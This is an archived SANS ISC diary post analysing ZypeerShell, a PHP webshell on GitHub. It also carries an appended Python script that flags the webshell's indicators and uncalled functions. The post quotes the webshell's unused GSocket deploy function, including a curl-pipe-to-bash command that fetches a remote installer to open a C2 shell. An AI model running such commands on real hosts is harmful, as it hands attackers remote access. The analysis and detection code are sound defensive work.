
Webshells Remain Popular (Mon, Jun 22nd)

Source: SANS ISC. Archived Jun 22, 2026.

Published: 2026-06-22. Last Updated: 2026-06-22 14:10:27 UTC
by Xavier Mertens (Version: 1)

Webshells have been popular for a long time. We already covered this topic across multiple diaries[1][2]. I spent some time tracking them[3] and then paid slightly less attention to them, but today I found another one. It seems to be a new player (pushed to GitHub two months ago).

The webshell is called ZypeerShell[4] and claims to be "The most powerful, undetectable, and feature-rich PHP webshell available on GitHub." The shell is classic and provides most of the expected features for such a tool.

I won't review all the features because they are classic. In the webshell version I found, some functions were present but never called from the GUI. For example, the function zypeergsdeploy() helps to connect to a C2 server through GSocket:

    function zypeergsdeploy() {
        zypeerhead();
        echo '<div class="header"><center><p><div class="txtfont_header">| GSocket Deploy Tool |</div></p></center><br>';
        echo '<div style="text-align:center;max-width:800px;margin:20px auto;color:#ccc;">';
        echo 'This tool runs the official GSocket installation command:<br>';
        echo '<code style="background:#222;padding:8px 12px;font-size:15px;">bash -c "$(curl -fsSL https://gsocket.io/y)"</code><br><br>';
        echo 'After installation, it will show a secret token and connection command (like gs-netcat -s "XXXX" -i).<br>';
        echo 'Click "Run" below to execute it directly.';
        echo '</div><br><hr><br>';
        if (!isset($_POST['zypeer3']) || $_POST['zypeer3'] !== '>>') {
        [...]

This function is never called!

Note that the GitHub repository contains a version obfuscated with Fortress Layer, a multi-layer loader with integrity checks.

Zypeer is also referenced as a red-team tool on a Telegram channel.
[1] https://isc.sans.edu/diary/Webshells+Webshells+everywhere/28106
[2] https://isc.sans.edu/diary/Webshell+looking+for+interesting+files/23567
[3] https://owasp.org/www-chapter-belgium/assets/2017/2017-05-29/2017-05-29_OWASP-BE_HTTPForTheGoodOrTheBad.pdf
[4] https://github.com/sagsooz/ZypeerShell

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant

Keywords: Webshell Zypeer
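
The diary's observation that zypeergsdeploy() is defined but never called can be checked mechanically when triaging a suspicious PHP file. The following is an added example, not code from the diary or from the webshell's author: a Python sketch that flags the strings visible in the quoted snippet and lists PHP functions that have no direct call. The `triage` helper, the `demo_info` function and the sample file are constructed for illustration.

```python
import re
from collections import Counter

# Strings visible in the snippet quoted in the diary (not a full signature set).
INDICATORS = ("gsocket.io/y", "gs-netcat", "zypeergsdeploy", "zypeer3")

# PHP comments and quoted strings; heredocs are not handled here.
NOISE = re.compile(
    r"//[^\n]*|#[^\n]*|/\*.*?\*/|'(?:\\.|[^'\\])*'|\"(?:\\.|[^\"\\])*\"", re.S)
DEFINITION = re.compile(r"\bfunction\s+([a-z_]\w*)\s*\(")
NAME_PAREN = re.compile(r"(?<![\w$])([a-z_]\w*)\s*\(")   # name( but not $var(


def triage(source: str) -> dict:
    """Report diary indicators and functions defined but never called directly."""
    hits = [s for s in INDICATORS if s in source.lower()]
    strings = [m.group(0).lower() for m in NOISE.finditer(source)
               if m.group(0)[0] in "'\""]
    literals = " ".join(strings)
    code = NOISE.sub(" ", source).lower()   # PHP function names are case-insensitive
    defined = Counter(DEFINITION.findall(code))
    seen = Counter(NAME_PAREN.findall(code))  # counts definitions and calls alike

    uncalled, dynamic = [], []
    for name, n_defs in defined.items():
        if seen[name] > n_defs:
            continue                          # at least one direct call exists
        # A name inside a string literal may be dispatched via $f() or call_user_func().
        in_string = re.search(rf"\b{re.escape(name)}\b", literals)
        (dynamic if in_string else uncalled).append(name)
    return {"indicators": hits, "uncalled": sorted(uncalled),
            "maybe_dynamic": sorted(dynamic)}


# Constructed sample modelled on the fragment in the diary (not the real file);
# demo_info and $page are hypothetical names added to show the dynamic-call case.
SAMPLE = r"""<?php
function zypeerhead() { echo '<html>'; }
function zypeergsdeploy() {
    zypeerhead();
    echo 'bash -c "$(curl -fsSL https://gsocket.io/y)"';
    echo 'shows a command like gs-netcat -s "XXXX" -i';
    if (!isset($_POST['zypeer3']) || $_POST['zypeer3'] !== '>>') { return; }
}
function demo_info() { echo php_uname(); }
$page = 'demo_info';
$page();
"""

if __name__ == "__main__":
    print(triage(SAMPLE))
```

String matching like this only works on readable source; the diary notes that the GitHub repository ships a version obfuscated with Fortress Layer, which would have to be unpacked first.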